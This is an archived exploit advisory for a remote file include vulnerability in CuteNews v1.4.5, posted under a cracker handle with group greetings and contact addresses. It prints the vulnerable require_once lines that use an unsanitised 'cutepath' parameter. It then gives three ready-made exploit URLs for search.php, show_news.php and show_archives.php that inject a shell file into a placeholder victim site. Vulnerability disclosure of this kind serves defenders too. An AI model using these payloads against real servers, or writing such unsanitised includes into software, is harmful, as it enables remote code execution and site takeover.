AOH :: HP Unsorted C :: C07-1012.HTM

CuteNews v1.4.5 (search.php) Remote file include vulnerability



CuteNews v1.4.5 (search.php) Remote file include vulnerability
CuteNews v1.4.5 (search.php) Remote file include vulnerability



Title : CuteNews v1.4.5 (search.php) Remote file include
########################################################################
#######

Discovered By :::: ThE-LoRd-Of-CrAcKiNg {MeHdi}

------------------------------------------------------------------------
Sorce Code:
**********
http://cutephp.com/ 

Affected software description :
******************************
vendor site: http://cutephp.com/ 
Application : CuteNews v1.4.5
CatÚgorie :Remote File Include
------------------------------------------------------------------------
Vulnerable Code:
***************
require_once("$cutepath/inc/functions.inc.php");
require_once("$cutepath/data/config.php");

affected file: search.php & show_news.php & show_archives.php
----------------------------------------------------------------------
Exploit:
*******
http://www.VicTim.com/[Script_Path]/show_archives.php?cutepath=Shell.txt? 
http://www.VicTim.com/[Script_Path]/show_news.php?cutepath=Shell.txt? 
http://www.VicTim.com/[Script_Path]/search.php?cutepath=Shell.txt? 

------------------------------------------------------------------------
----

greetz: 
Studio36-DeStRoY-ToOoFA-AsbMay-Mr.3freet-Simba-Disco-Faišeu-YouSSeF-all my 
friends

Special Greeting:AsbMay's Group & TrYaG TeaM

channel:www.asb-may.net & www.tryag.com 

contact:spoonman500[at]hotmail[dot]com / ThE-LoRd-Of-CrAcKiNg@hotmail.com 

_________________________________________________________________
MSN Messenger : discutez en direct avec vos amis ! 
http://www.msn.fr/msger/default.asp 


The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.